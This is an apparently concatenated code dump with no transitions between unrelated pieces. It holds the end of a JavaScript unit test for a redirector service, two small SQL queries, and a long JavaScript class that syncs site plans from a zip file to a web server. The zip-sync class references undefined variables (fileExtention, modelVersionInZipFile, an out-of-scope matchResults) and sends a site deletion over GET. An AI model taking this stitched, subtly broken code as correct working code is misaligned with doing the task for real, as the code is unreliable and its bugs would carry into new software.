                name: 'test_name',
                revision,
                target: 'test.target.com',
                apiSecret: 'test_api_secret'
            }
        };
        expectedResult = 'test_result';
        postStub = sinon.stub(request, 'post');
        sendStub = sinon.stub();
        setStub = sinon.stub();
        // Fake fluent request object so post(...).send(...).set(...).set(...) chains.
        requestStub = {
            send: sendStub,
            set: setStub
        };
        for (let stub of [sendStub, postStub]) {
            stub.returns(requestStub);
        }
        // NOTE: order-sensitive — the first .set() continues the chain,
        // the second .set() resolves with the final result.
        setStub.onFirstCall().returns(requestStub);
        setStub.onCall(1).returns(Promise.resolve(expectedResult));
    });

    afterEach(() => {
        // Restore the stubbed superagent.post so other suites see the real one.
        request.post.restore();
    });

    describe('#save', () => {
        it('should send request to the redirector service with the proper arguments', async () => {
            const config = Object.assign({}, defaultConfig);
            const result = await Redirector.save(config, revision);
            expect(postStub).to.be.calledWith('https://test_url/api/route');
            expect(sendStub).to.be.calledWith({
                name: 'test_name',
                revision,
                target: 'test.target.com/' + revision
            });
            expect(setStub).to.have.calledWith('Accept', 'application/json');
            expect(setStub).to.have.calledWith('x-auth', 'test_api_secret');
            expect(result).to.eql(expectedResult);
        });

        it('should send request to the redirector service with project suffix when given', async () => {
            // projectName should be inserted between the target host and the revision.
            const config = Object.assign({ projectName: 'myProjectName' }, defaultConfig);
            const result = await Redirector.save(config, revision);
            expect(postStub).to.be.calledWith('https://test_url/api/route');
            expect(sendStub).to.be.calledWith({
                name: 'test_name',
                revision,
                target: 'test.target.com/myProjectName/' + revision
            });
            expect(setStub).to.have.calledWith('Accept', 'application/json');
            expect(setStub).to.have.calledWith('x-auth', 'test_api_secret');
            expect(result).to.eql(expectedResult);
        });
    });
});
-- Suppress SQL*Plus command echo and substitution-variable verification output.
SET ECHO OFF
SET VERIFY OFF

-- List products of the type given by the first script argument (&1)
-- whose price exceeds the second argument (&2).
SELECT product_id, product_type_id, name, price
FROM products
WHERE product_type_id = &1
AND price > &2;
-- Count how many customers live in each city.
SELECT City, COUNT(*)
FROM Customers
GROUP BY City
'use strict';

import { COL } from "../COL.js";
import { Model } from "../core/Model.js";
import { Layer } from "../core/Layer.js";
import { BlobInfo } from "../core/BlobInfo.js";
import { ApiService } from "../core/ApiService.js";
import "../core/Core.js";
import { ImageInfo } from "../core/ImageInfo.js";
import { ZipLoader } from "../../static/ZipLoader.module.js";
import { PlanInfo } from "../util/PlanInfo.js";
import { Scene3DtopDown } from "../core/Scene3DtopDown.js";
import "../util/Util.js";
import "../util/Util.AssociativeArray.js";
import "../util/ErrorHandlingUtil.js";
import { FileZipUtils } from "./FileZipUtils.js";

// Handles reading a site zip file (with an embedded JSON description) and
// syncing its sites/plans/files with the web server.
class FileZip_withJson {
    constructor(name, planInfo){
        // Zip files that have been opened so far, keyed by name.
        this.openedZipFileList = new COL.util.AssociativeArray();
        // Site descriptions parsed out of the currently loaded zip file.
        this.sitesInfo_inFileZip = new COL.util.AssociativeArray();
        // Per-site file info plus data shared between all site plans.
        this.sitesFilesInfo = {};
        this.sitesFilesInfo["sites"] = {};
        this.sitesFilesInfo["otherDataSharedBetweenAllSitePlans"] = new COL.util.AssociativeArray();
        // Names of layer .json descriptor files found in the zip.
        this.layerJsonFilenames = [];
        // Model version recorded in the zip file; set via setModelVersionInZipFile().
        this.modelVersionInZipFile = undefined;
    };

    // Thin wrapper that delegates the actual download-to-zip work to FileZipUtils.
    saveFromWebServerToZipFile_viaRegularZip2 = function (groupId) {
        return FileZipUtils.saveFromWebServerToZipFile_viaRegularZip(groupId);
    };

    setModelVersionInZipFile = function(modelVersionInZipFile) {
        this.modelVersionInZipFile = modelVersionInZipFile;
    };

    // Checks whether the given in-zip site may be uploaded: the backend must
    // already know a site with that name. Returns
    // { retval: boolean, siteInfo_inBackend: object } — siteInfo_inBackend is
    // populated only when retval is true.
    isSiteValidForUpload = async function (siteInfo_inFileZip) {
        // console.log('BEG isSiteValidForUpload');

        /////////////////////////////////////////////
        // Check if the site is valid to be uploaded to the website
        /////////////////////////////////////////////

        let getSiteByNameResultAsJson = await COL.model.getSiteByName(siteInfo_inFileZip.siteName);

        let retval1 = {
            retval: false,
            siteInfo_inBackend: {}
        };

        // A truthy `name` in the response means the backend found the site.
        if(getSiteByNameResultAsJson.name) {
            let siteInfo = COL.model.createSiteInfoFromJson(getSiteByNameResultAsJson, this.modelVersionInZipFile)
            retval1['retval'] = true;
            retval1['siteInfo_inBackend'] = siteInfo;
        }
        else {
            console.log('File is invalid for upload');
        }

        return retval1;
    }
syncZipSitePlanEntryWithWebServer2 = async function (plan_inFileZip) { console.log('BEG syncZipSitePlanEntryWithWebServer2'); ///////////////////////////////////////////// // Do xxx ///////////////////////////////////////////// let retval = true; let planInfo = plan_inFileZip; let getPlanBySiteAndPlanNamesResultAsJson = await FileZipUtils.getPlanBySiteAndPlanNames(planInfo) if(getPlanBySiteAndPlanNamesResultAsJson.plan_name) { // A plan with the planInfo.siteName and planInfo.name already exists // Update the existing sitePlan with content from the sitePlan in the zip file let siteName = getPlanBySiteAndPlanNamesResultAsJson.site_name; let msgStr = 'siteName: ' + siteName + ', plan_name: ' + getPlanBySiteAndPlanNamesResultAsJson.plan_name + ' already exists for the user. Update the existing sitePlan with content from the sitePlan in the zip file'; planInfo.newSiteId = getPlanBySiteAndPlanNamesResultAsJson.site_id; planInfo.newPlanId = getPlanBySiteAndPlanNamesResultAsJson.plan_id; } else { // A plan with the planInfo.siteName and planInfo.name does NOT exists for the user // create a new sitePlan with content from the sitePlan in the zip file let msgStr = 'siteName: ' + planInfo.siteName + ', plan_name: ' + planInfo.name + ' do NOT exist for the user. 
Create a new sitePlan with content from the sitePlan in the zip file'; let addNewPlanResultAsJson = await FileZip_withJson.addNewPlan(planInfo); planInfo.newSiteId = addNewPlanResultAsJson.site_id; planInfo.newPlanId = addNewPlanResultAsJson.plan_id; } return retval; }; syncZipSitePlanFilesWithWebServer2 = async function (plan_inFileZip) { // console.log('BEG syncZipSitePlanFilesWithWebServer2'); try { let retval = true; COL.model.image_db_operations_array = []; ///////////////////////////////////////////// // getLayerByPlanInfo ///////////////////////////////////////////// let syncRetVals = []; let layer = COL.model.getLayerByPlanInfo(plan_inFileZip); if(COL.util.isObjectInvalid(layer)) { // sanity check console.error('plan_inFileZip', plan_inFileZip); console.error('layer is invalid for plan_inFileZip'); retval = false; return retval; } let imagesInfo = layer.getImagesInfo(); let planInfo = layer.getPlanInfo(); let path = planInfo.siteId + '/' + planInfo.id; let imageFilenames = imagesInfo.getValues(); ///////////////////////////////////////////// // clear all blobsUrls of the current zipfile layer // before uploading the files to the webserver // this helps preventing "out of memory" errors ///////////////////////////////////////////// console.log('clear all blobsUrls'); for (let filename in imageFilenames) { let imageInfo = imagesInfo.getByKey(filename); let blobInfo = imageInfo.blobInfo; if(COL.util.isObjectInvalid(blobInfo)) { // sanity check console.error('blobInfo is invalid for filename: ', filename); } let filenameFullPath = blobInfo.dirname + '/' + blobInfo.filename; // clear the memory via revokeObjectURL() // mark the "buffer" as empty and "url" as null to indicate that the blob is no longer in memory // the buffer and url is the same in blobInfo.blobUrl if(COL.util.isObjectValid(blobInfo.blobUrl)) { // console.log('revokeObjectURL for blobInfo.blobUrl'); URL.revokeObjectURL(blobInfo.blobUrl); blobInfo.blobUrl = null; } let zipFileInfo = 
COL.model.getZipFileInfo(); zipFileInfo.files[filenameFullPath].buffer = null; zipFileInfo.files[filenameFullPath].url = null; } //////////////////////////////////////////////////////////////////////////////////// // sync files of the current zipfile layer // optionally save the files to to the file system // (and defer the save to the db, to a separate step - see below) //////////////////////////////////////////////////////////////////////////////////// // sync images await this.syncFilesOfTheCurrentZipFileLayer2(planInfo, imagesInfo, imageFilenames, syncRetVals); let metaDataFilesInfo = layer.getMetaDataFilesInfo(); let metaDataFilenames = metaDataFilesInfo.getValues(); // sync metadata (e.g. .json) await this.syncFilesOfTheCurrentZipFileLayer2(planInfo, metaDataFilesInfo, metaDataFilenames, syncRetVals); ////////////////////////////////////////////////////// // Check if the sync was successful ////////////////////////////////////////////////////// let allFilesSyncStatus = true; let msgStr = "List of files that were not synced: "; syncRetVals.forEach(function(syncRetVal){ // console.log(syncRetVal); if(!syncRetVal['syncStatus']) { allFilesSyncStatus = false; let msgStr1 = "filePath: " + syncRetVal['filePath'] + ", syncStatus: " + syncRetVal['syncStatus'] + "<br /><br />"; msgStr = msgStr + msgStr1; } }); //////////////////////////////////////////////////////////////////////////////////// // sync files of the current zipfile layer // optionally save the files to to the db in a separate step //////////////////////////////////////////////////////////////////////////////////// if(allFilesSyncStatus) { // insert/update/delete from the database with the new/updated/deleted images let jsonData = {image_db_operations_array: COL.model.image_db_operations_array}; let jsonDataAsStr = JSON.stringify(jsonData); const formData = new FormData(); formData.append('json_data_as_str', jsonDataAsStr); let headersData = { 'X-CSRF-Token': COL.model.csrf_token }; let fetchData = { 
method: 'POST',
                headers: headersData,
                body: formData
            };
            // queryUrl - e.g. http://192.168.1.74/api/v1_2/insert_update_delete_images_in_db
            let queryUrl = COL.model.getUrlBase() + 'api/v1_2/insert_update_delete_images_in_db';
            let response = await fetch(queryUrl, fetchData);
            await COL.errorHandlingUtil.handleErrors(response);
        }

        if(allFilesSyncStatus) {
            msgStr = "All files were synced!";
        }
        console.log('msgStr', msgStr);

        return retval;
    }
    catch (err) {
        console.error('err', err);
        throw new Error('Error from syncZipSitePlanFilesWithWebServer2');
    }
};

// Sync every file listed in `filenames` (entries of `filesInfo`) to the webserver,
// loading each blob from the zip on demand and releasing it again after the sync.
// Per-file results are appended to `syncRetVals`.
syncFilesOfTheCurrentZipFileLayer2 = async function (planInfo, filesInfo, filenames, syncRetVals) {
    // console.log('BEG syncFilesOfTheCurrentZipFileLayer2');

    console.log('sync files to webserver');

    let counter = 0;
    // report progress every reportEveryNumFiles files
    const reportEveryNumFiles = 10;
    // NOTE(review): sitesInfo is fetched here but not used in this function.
    let sitesInfo = COL.model.getSitesInfo();
    let filenamesLength = Object.keys(filenames).length;
    for (let filename in filenames) {
        counter += 1;
        if(counter % reportEveryNumFiles == 0) {
            let msgStr = counter + " of: " + filenamesLength;
            console.log(msgStr);
        }

        let fileInfo = filesInfo.getByKey(filename);
        let blobInfo = fileInfo.blobInfo;
        if(COL.util.isObjectInvalid(blobInfo)) {
            // sanity check
            console.error('blobInfo is invalid');
        }
        let filenameFullPath = blobInfo.dirname + '/' + blobInfo.filename;

        if(COL.util.isObjectInvalid(blobInfo.blobUrl)) {
            // https://www.joji.me/en-us/blog/processing-huge-files-using-filereader-readasarraybuffer-in-web-browser/
            // tbd - maybe only open the zip file and read specific file for big files, and for small files e.g. < 100B keep the Model::_zipFileArrayBuffer ??
            //
            // The file is not yet in memory, but its offset is stored in memory.
            // Unzip the image file data
            await FileZip_withJson.readZipEntryData(filenameFullPath)
            blobInfo = await this.addBlobToFilesInfo(filenameFullPath, filesInfo);

            // sanity test - verify the freshly created blob url is fetchable
            let response = await fetch(blobInfo.blobUrl);
            if (!response.ok) {
                console.log('Error from syncFilesOfThe CurrentZipFileLayer. Error fetching blobInfo.blobUrl');
            }
        }

        let syncRetVal = await this.syncZipFileBlobWithWebServer2(planInfo, blobInfo);

        // ZipLoader.clear() clears the entire file entry,
        // i.e. the buffer (which we may want to clear to conserve memory),
        // but also the header attributes (offsetInZipFile, compressedSize, etc...) which we want to preserve
        // so don't call "ZipLoader.clear()"
        if(COL.util.isObjectValid(blobInfo.blobUrl)) {
            // console.log('revokeObjectURL for blobInfo.blobUrl');
            URL.revokeObjectURL(blobInfo.blobUrl);
            blobInfo.blobUrl = null;
        }

        // mark the "buffer" as empty and "url" as null to indicate that the blob is no longer in memory
        // the buffer and url is the same in blobInfo.blobUrl, which is released above
        // (the memory is cleared via "revokeObjectURL(blobInfo.blobUrl)"
        let zipFileInfo = COL.model.getZipFileInfo();
        zipFileInfo.files[filenameFullPath].buffer = "";
        // console.log('revokeObjectURL for zipFileInfo.files[filenameFullPath].url');
        // URL.revokeObjectURL(zipFileInfo.files[filenameFullPath].url);
        zipFileInfo.files[filenameFullPath].url = null;

        syncRetVals.push(syncRetVal);
    }
};

// Sync a single blob to the webserver.
// Returns {filePath, syncStatus, ...} (syncStatus defaults to false until the upload succeeds).
syncZipFileBlobWithWebServer2 = async function (planInfo, blobInfo) {
    let filename = blobInfo.filename;

    // sanity check
    if(COL.util.isObjectInvalid(blobInfo.blobUrl)) {
        // At this point the blob should be in memory
        console.log('blobInfo.filename', blobInfo.filename);
        console.log('blobInfo.dirname', blobInfo.dirname);
        throw new Error('Invalid blobInfo.blobUrl');
    }

    let syncRetVal = {};
    syncRetVal["filePath"] = filename;
    syncRetVal["syncStatus"] = false;

    let fileType = COL.util.getFileTypeFromFilename(filename);
    switch(fileType) {
        case "mtl":
        case "obj":
        case "jpg":
        case "png":
        case "json": {
            // blobInfo.isDirty = true;
            // await blobInfo.syncBlobToWebServer(sitesInfo);
            // blobInfo.isDirty = false;

            // add layer.json
            // verify that the dirname matches the path pattern: siteId/planId
            let matchResults = blobInfo.dirname.match( /(\d+)\/(\d+)/i );
            if(matchResults) {
                blobInfo.isDirty =
true; // extract siteId, planId from sitesInfo and filePathOrig stripped from siteId/planId let retVal = Layer.GetSiteIdPlanIdAndFilePath(planInfo); let siteId = retVal['siteId']; let planId = retVal['planId']; let filePath = retVal['filePath']; let doDeferFileSystemAndDbSync = false; syncRetVal = await blobInfo.syncBlobToWebServer(siteId, planId, filePath, doDeferFileSystemAndDbSync); blobInfo.isDirty = false; } else { console.error("Failed to match blobInfo.dirname"); console.log('blobInfo', blobInfo); console.log('matchResults', matchResults); } break; } default: { console.error("File extention is not supported", fileExtention); break; } } return syncRetVal; }; syncZipSitePlanWithWebServer2 = async function (plan_inFileZip) { console.log('BEG syncZipSitePlanWithWebServer2'); // Sync the plan entry in the database // if the plan is not already in the db, create a new plan entry let retval1 = await this.syncZipSitePlanEntryWithWebServer2(plan_inFileZip); let retval2 = false; if(retval1) { // Upload the plan related files to the webserver (persist in the database, and upload to the file system) retval2 = await this.syncZipSitePlanFilesWithWebServer2(plan_inFileZip); } return retval2; }; syncZipSiteWithWebServer2 = async function (siteInfo_inFileZip, siteInfo_inBackend) { console.log('BEG syncZipSiteWithWebServer2'); /////////////////////////////////////////// // delete the old site /////////////////////////////////////////// // @bp.route('/admin/delete/site/<site_id>', methods=['DELETE']) // @bp.route('/admin/delete/site/<site_id>', methods=['POST']) // https://localhost/api/v1_2/admin/delete/site/71 let queryUrl = COL.model.getUrlBase() + 'api/v1_2/admin/delete/site/' + siteInfo_inBackend.siteId; let fetchData = { method: 'GET' // method: 'DELETE' // method: 'POST' }; // queryUrl - e.g. 
http://192.168.1.74/api/v1_2/admin/delete/site/47 let response = await fetch(queryUrl, fetchData); await COL.errorHandlingUtil.handleErrors(response); ///////////////////////////////////////////// // Sync the site from the .zip file ///////////////////////////////////////////// let retval = false; let iter = siteInfo_inFileZip.plans.iterator(); while (iter.hasNext()) { let plan_inFileZip = iter.next(); let retval2 = await this.syncZipSitePlanWithWebServer2(plan_inFileZip); retval = (retval || retval2); } return retval; }; syncZipSitesWithWebServer2 = async function () { console.log('BEG syncZipSitesWithWebServer2'); let retval1 = true; let syncZipSitesWithWebServer_statusStr = ""; let iter = this.sitesInfo_inFileZip.iterator(); while (iter.hasNext()) { let siteInfo_inFileZip = iter.next(); ///////////////////////////////////////////// // Check if the site is valid to be uploaded to the website ///////////////////////////////////////////// let siteName = siteInfo_inFileZip.siteName; let isSiteValidForUpload_results = await this.isSiteValidForUpload(siteInfo_inFileZip) if(isSiteValidForUpload_results.retval) { let retval_syncZipSiteWithWebServer2 = await this.syncZipSiteWithWebServer2(siteInfo_inFileZip, isSiteValidForUpload_results.siteInfo_inBackend); if(!retval_syncZipSiteWithWebServer2) { syncZipSitesWithWebServer_statusStr += (`Failed to sync site: ${siteName}\n`); } else { syncZipSitesWithWebServer_statusStr += (`Succeeded to sync site: ${siteName}\n`); } retval1 = (retval1 || retval_syncZipSiteWithWebServer2); } else { syncZipSitesWithWebServer_statusStr += (`Site is invalid for upload: ${siteName}\n`); retval1 = false; } } let retval3 = { retval: retval1, syncZipSitesWithWebServer_statusStr: syncZipSitesWithWebServer_statusStr } return retval3; }; // -------------------------------------------------------------- //////////////////////////////////////////////////////////////////////////// // We create sitesFilesInfo (multiple planImagesInfo, and 
planMetaDataFilesInfo) // from the zip file data, which refers to multiple site plans. // by sorting the specific file (filenameFullPath) to an entry in sitesFilesInfo (for a specific site_plan) // and by returning a reference to an entry in sitesFilesInfo (for a specific site_plan) // // Get the planImagesInfo, planMetaDataFilesInfo, origSiteId, origPlanId from sitesFilesInfo // for a specified filenameFullPath (which relates to a specific site plan) //////////////////////////////////////////////////////////////////////////// getFilesInfoForSpecifiedFilename = function (filenameFullPath) { // console.log('BEG getFilesInfoForSpecifiedFilename'); let pathElements = COL.util.getPathElements(filenameFullPath); let dirname = pathElements['dirname']; let filename = pathElements['filename']; let extension = pathElements['extension']; let isRegularFile = false; let planImagesInfo = undefined; let planMetaDataFilesInfo = undefined; let otherDataSharedBetweenAllSitePlans = undefined; let origSiteId = undefined; let origPlanId = undefined; if(extension) { origSiteId = 0; origPlanId = 0; let matchResults = dirname.match( /(\d+)\/(\d+).*/i ); if(matchResults) { origSiteId = matchResults[1]; origPlanId = matchResults[2]; if(!this.sitesFilesInfo["sites"][origSiteId]) { this.sitesFilesInfo["sites"][origSiteId] = {}; } if(!this.sitesFilesInfo["sites"][origSiteId][origPlanId]) { this.sitesFilesInfo["sites"][origSiteId][origPlanId] = { imagesInfo: new COL.util.AssociativeArray(), metaDataFilesInfo: new COL.util.AssociativeArray() }; } let fileType = COL.util.getFileTypeFromFilename(filenameFullPath); switch(fileType) { case "jpg": case "png": { planImagesInfo = this.sitesFilesInfo["sites"][origSiteId][origPlanId].imagesInfo; isRegularFile = true; break; } case "json": case "txt": { planMetaDataFilesInfo = this.sitesFilesInfo["sites"][origSiteId][origPlanId].metaDataFilesInfo; isRegularFile = true; break; } default: { let msgStr = 'filename: ' + filename + ', fileType: ' + fileType + 
' in .zip file is not supported'; throw new Error(msgStr); } } } else { if(FileZipUtils.isSharedDataBetweenAllSitePlans(filenameFullPath)) { if(!this.sitesFilesInfo["otherDataSharedBetweenAllSitePlans"]) { this.sitesFilesInfo["otherDataSharedBetweenAllSitePlans"] = new COL.util.AssociativeArray(); } otherDataSharedBetweenAllSitePlans = this.sitesFilesInfo["otherDataSharedBetweenAllSitePlans"]; isRegularFile = true; } else { console.error('dirname', dirname); console.error('matchResults', matchResults); let msgStr = 'Invalid filenameFullPath: ' + filenameFullPath; throw new Error(msgStr); } } } else { // This could be a directory, not an actual file console.log('The file does not have an extension, i.e. it is a directory'); console.log('filenameFullPath', filenameFullPath); isRegularFile = false; } let retVal = {}; retVal['origSiteId'] = origSiteId; retVal['origPlanId'] = origPlanId; retVal['planImagesInfo'] = planImagesInfo; retVal['planMetaDataFilesInfo'] = planMetaDataFilesInfo; retVal['otherDataSharedBetweenAllSitePlans'] = otherDataSharedBetweenAllSitePlans; retVal['isRegularFile'] = isRegularFile; // ImageInfo.PrintImagesInfo(retVal.planImagesInfo); // console.log('foo1'); return retVal; }; loadFilesFromZipFileInfoIntoBlobs = async function () { // console.log('BEG loadFilesFromZipFileInfoIntoBlobs'); // ///////////////////////////////////////////////////////////// // Load files from zip-file-info into blobs // skip jpg images // ///////////////////////////////////////////////////////////// console.log('Load files from zip file into blobs'); // loop over keys let zipFileInfo = COL.model.getZipFileInfo(); let filenames = Object.keys(zipFileInfo.files); // console.log('filenames', filenames); let numFiles = filenames.length; console.log('numFiles', numFiles); let countIndex = 0; let msgStr = "Loading " + numFiles + " files"; let numFilesBetweenReporting = 10; for (var key in filenames) { if( (countIndex % numFilesBetweenReporting) == 0 ) { // show progress - 
update the spinner, and send a log message with the number of files // that were loaded so far let msgStr = countIndex + " out of " + numFiles; console.log(msgStr); let spinnerEl = document.getElementById('cssLoaderId'); spinnerEl.setAttribute('data-text', msgStr); } countIndex += 1; let filenameFullPath = filenames[key]; let pathElements = COL.util.getPathElements(filenameFullPath); let dirname = pathElements['dirname']; let basename = pathElements['basename']; let extension = pathElements['extension']; // tbd replace fileExtention with filename let fileExtention = COL.util.getFileExtention(filenameFullPath); let filename = basename + '.' + fileExtention; // //////////////////////////////////////////////////////////////////////////////////// // get filesInfo for files that are related to the specified file // - all the planImagesInfo for the plan of the specified file // - all the planMetaDataFilesInfo for the plan of the specified file // - all the otherDataSharedBetweenAllSitePlans that are shared across all the sites and plans // - etc.. // //////////////////////////////////////////////////////////////////////////////////// let retVal = this.getFilesInfoForSpecifiedFilename(filenameFullPath); let planImagesInfo = retVal.planImagesInfo; let planMetaDataFilesInfo = retVal.planMetaDataFilesInfo; let otherDataSharedBetweenAllSitePlans = retVal.otherDataSharedBetweenAllSitePlans; let origSiteId = retVal.origSiteId; let origPlanId = retVal.origPlanId; let isRegularFile = retVal.isRegularFile; // console.log('filenameFullPath', filenameFullPath); if(!isRegularFile) { // skip e.g. directories continue; } let fileType = COL.util.getFileTypeFromFilename(filenameFullPath); let fileInfo = zipFileInfo.files[filenameFullPath]; switch(fileType) { case undefined: // e.g. 
skip directory names break; case "jpg": case "png": { // it looks like the imagesInfo is loaded from the json file let doSkip_loadImagesFromZipFile_imagesAreManagedViaJsonFile = true; if(doSkip_loadImagesFromZipFile_imagesAreManagedViaJsonFile) { break; } else { // separate to 2 groups: // a. floor plan images e.g. xxx_ground1.jpg // b. all other images e.g. IMG_6399.jpg // tbd - regex to match the floor plan images e.g. ground1... ? let re2 = /^image.*\.jpg$/; let overlayRectImageRegexMatched = filename.match(re2); if(overlayRectImageRegexMatched) { // do not load the actual image // Create a placeholder blobInfo, add blobInfo to imageInfo, add imageInfo to planImagesInfo let blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: undefined, isDirty: true}); let imageInfo = new ImageInfo({filename: filename, blobInfo: blobInfo}); planImagesInfo.set(filename, imageInfo); } else { // load the actual image if (fileInfo.url) { // the blob is already in memory. Create a blobInfo from the blob, add blobInfo to imageInfo, add imageInfo to planImagesInfo let blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: fileInfo.url, isDirty: true}); let imageInfo = new ImageInfo({filename: filename, blobInfo: blobInfo}); planImagesInfo.set(filename, imageInfo); } else { // the blob is not yet in memory. 
Extract the image let blobUrl = await this.getImageBlobUrlFromZipFile(filenameFullPath, planImagesInfo); // get the blob from the blobUrl // https://stackoverflow.com/questions/11876175/how-to-get-a-file-or-blob-from-an-object-url let response = await fetch(blobUrl); await COL.errorHandlingUtil.handleErrors(response); let blob = await response.blob(); let pathElements = COL.util.getPathElements(fileInfo.filename); let extension = pathElements['extension']; let imageTags = { filename: fileInfo.filename, imageOrientation: -1 }; if(extension === 'jpg') { imageTags = await COL.core.ImageFile.getImageTags(fileInfo.filename, blob); } let blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: fileInfo.url, isDirty: true}); let imageInfo = new ImageInfo({filename: filename, imageTags: imageTags, blobInfo: blobInfo}); planImagesInfo.set(filename, imageInfo); } } break; } } case "json": { await FileZip_withJson.extractAsBlobUrl( fileInfo, 'text/plain' ); let blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: fileInfo.url, isDirty: true}); let imageInfo = new ImageInfo({filename: filename, blobInfo: blobInfo}); if(FileZipUtils.isSharedDataBetweenAllSitePlans(filenameFullPath)) { otherDataSharedBetweenAllSitePlans.set(filename, imageInfo); } else { planMetaDataFilesInfo.set(filename, imageInfo); } // console.log('filenameFullPath', filenameFullPath); // console.log('blobInfo', blobInfo); let jsonData = await FileZipUtils.loadFile_viaFetch(filenameFullPath, blobInfo, "json"); // console.log('jsonData', jsonData); let notes_metadata_re = /notes/; let notes_metadata_re_matched = filename.match(notes_metadata_re); if(notes_metadata_re_matched) { if(COL.model.isStickyNotesEnabled()) { // // found notes metadata json file, i.e. 
sticky notes // COL.core.FileNotes.loadNotesFromJsonFile(layer, filename); } } break; } default: { let msgStr = 'filename: ' + filename + ', fileType: ' + fileType + ' in .zip file is not supported'; throw new Error(msgStr); } } } }; validateVersion = function () { // console.log('BEG validateVersion'); let modelVersion = COL.model.getModelVersion(); let minZipVersion = COL.model.getMinZipVersion(); let retval = true; if(!this.modelVersionInZipFile || (this.modelVersionInZipFile < minZipVersion)) { // the .zip file version is invalid (for reading the .zip file) console.error('modelVersionInZipFile is invalid. System model version: ' + modelVersion + " , modelVersionInZipFile: " + modelVersionInZipFile + " , minZipVersion supported: " + minZipVersion); retval = false; } return retval; }; validateVersionAndExtractSitesInfo = async function () { // console.log('BEG validateVersionAndExtractSitesInfo'); // ///////////////////////////////////////////////////////////// // validate the version in the zipFile // Extract sitesInfo - based on sitesInfo we create the various layers // ///////////////////////////////////////////////////////////// // Get general metadata let generalMetadataFilename = "general_metadata.json"; let imagesInfoOtherData = this.sitesFilesInfo["otherDataSharedBetweenAllSitePlans"]; let imageInfoOtherData = imagesInfoOtherData.getByKey(generalMetadataFilename); let blobInfo = imageInfoOtherData.blobInfo; if(COL.util.isObjectInvalid(blobInfo) || COL.util.isObjectInvalid(blobInfo.blobUrl)) { // should not reach here imagesInfoOtherData.printKeysAndValues(); console.log('generalMetadataFilename', generalMetadataFilename); console.error('Missing file: ' + generalMetadataFilename ); return false; } let generalInfo = await FileZipUtils.loadFile_viaFetch(generalMetadataFilename, blobInfo, "json"); let modelVersionInZipFile = parseFloat(COL.util.getNestedObject(generalInfo, ['generalInfo', 'modelVersion'])); 
this.setModelVersionInZipFile(modelVersionInZipFile); // Validate version if( !this.validateVersion() ) { // should not reach here var msgStr = 'Version validation failed'; throw new Error(msgStr); } // Get sitesInfo let sitesInfoFilename = "sitesInfo.json"; let imageInfoOtherData2 = imagesInfoOtherData.getByKey(sitesInfoFilename); let blobInfo1 = imageInfoOtherData2.blobInfo; if(COL.util.isObjectInvalid(blobInfo1) || COL.util.isObjectInvalid(blobInfo1.blobUrl)) { // should not reach here imagesInfoOtherData.printKeysAndValues(); console.log('sitesInfoFilename', sitesInfoFilename); console.error('Missing file: ' + sitesInfoFilename ); return false; } // load via fetch from blob URL that is in memory (not on webserver) let sitesInfo_inFileZip = await FileZipUtils.loadFile_viaFetch(sitesInfoFilename, blobInfo1, "json"); /////////////////////////////////////////////////////////////// // fill-in this.sitesInfo_inFileZip // convert from: // sitesInfo_inFileZip (uses: snake format, dictionary of dictionaries) // to: // sitesInfo_inFileZip (uses: camelCase format, AssociativeArray of AssociativeArrays) /////////////////////////////////////////////////////////////// this.sitesInfo_inFileZip = new COL.util.AssociativeArray(); for (let siteId_inFileZip in sitesInfo_inFileZip) { let siteInfo_inFileZip = sitesInfo_inFileZip[siteId_inFileZip]; // console.log('siteInfo_inFileZip', siteInfo_inFileZip); let siteInfo = COL.model.createSiteInfoFromJson(siteInfo_inFileZip, this.modelVersionInZipFile) // console.log('siteInfo3', siteInfo.toString()); this.sitesInfo_inFileZip.set(siteId_inFileZip, siteInfo); } COL.model.setSitesInfo(this.sitesInfo_inFileZip); // https://stackoverflow.com/questions/22266171/javascript-html-select-add-optgroup-and-option-dynamically let iterSites = this.sitesInfo_inFileZip.iterator(); while (iterSites.hasNext()) { let siteInfo_inFileZip = iterSites.next(); let optionGroupEl = $('<optgroup label="' + siteInfo_inFileZip.siteId + '" />'); let iterPlans = 
siteInfo_inFileZip.getPlans().iterator();
        while (iterPlans.hasNext()) {
            let planInfo_inFileZip = iterPlans.next();
            let path = planInfo_inFileZip.siteId + '/' + planInfo_inFileZip.id;
            let planFilenameFullPath = path + '/' + planInfo_inFileZip.planFilename;
            // remember the per-plan layer json path for createLayers/populateLayers
            this.layerJsonFilenames.push(planFilenameFullPath);

            // the string in the sitePlan menu
            let optionVal = planInfo_inFileZip.siteId + ":" + planInfo_inFileZip.id + ":" + planInfo_inFileZip.siteName + ":" + planInfo_inFileZip.name;
            $('<option />').html(optionVal).appendTo(optionGroupEl);
        }
        console.log('optionGroupEl', optionGroupEl);
        optionGroupEl.appendTo($('#sitesId'));
    }
};

// Create one layer per entry in this.layerJsonFilenames, after verifying that the
// plan's layer-json blob was extracted from the zip file.
createLayers = function () {
    console.log('BEG createLayers');

    for (let index in this.layerJsonFilenames) {
        let topDownJsonFullPath = this.layerJsonFilenames[index];
        let pathElements = COL.util.getPathElements(topDownJsonFullPath);
        let dirname = pathElements['dirname'];
        let layerJsonFilename = pathElements['filename'];

        let retVal = this.getFilesInfoForSpecifiedFilename(topDownJsonFullPath);
        // let imagesInfo = retVal.imagesInfo;
        let planMetaDataFilesInfo = retVal.planMetaDataFilesInfo;
        // let otherDataSharedBetweenAllSitePlans = retVal.otherDataSharedBetweenAllSitePlans;
        let origSiteId = retVal.origSiteId;
        let origPlanId = retVal.origPlanId;

        let metaDataFileInfo = planMetaDataFilesInfo.getByKey(layerJsonFilename);
        let blobInfo = metaDataFileInfo.blobInfo;
        if(COL.util.isObjectInvalid(blobInfo) || COL.util.isObjectInvalid(blobInfo.blobUrl)) {
            // should not reach here
            planMetaDataFilesInfo.printKeysAndValues();
            let msgStr = 'Invalid blobInfo for layerJsonFilename: ' + layerJsonFilename;
            throw new Error(msgStr);
        }

        // Get the plan from the path
        let planInfo = COL.model.getPlanInfoBySiteIdAndPlanId(origSiteId, origPlanId);
        let layer = COL.model.createLayer(planInfo);
        COL.model.addLayer(layer);
    }
};

// Fill every created layer with its metaDataFilesInfo and imagesInfo (loaded via
// the layer json file), then select the last-populated layer in the scene/menu.
populateLayers = async function () {
    // console.log('BEG populateLayers');
    // let numPlans = $("#sitesId option").length;
    // console.log('numPlans1', numPlans);

